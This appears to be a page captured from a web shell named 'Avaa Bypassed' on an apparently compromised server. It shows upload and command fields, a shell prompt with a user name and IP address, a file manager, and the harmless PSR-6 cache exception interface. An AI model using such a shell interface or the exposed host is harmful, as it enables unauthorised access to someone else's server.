404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.128.205.137: ~ $
<?php

namespace Psr\Cache;

/**
 * Exception interface for invalid cache arguments.
 *
 * Any time an invalid argument is passed into a method it must throw an
 * exception class which implements Psr\Cache\InvalidArgumentException.
 */
interface InvalidArgumentException extends CacheException
{
}

Filemanager

Name Type Size Permission Actions
CacheException.php File 162 B 0644
CacheItemInterface.php File 3.77 KB 0644
CacheItemPoolInterface.php File 4.37 KB 0644
InvalidArgumentException.php File 299 B 0644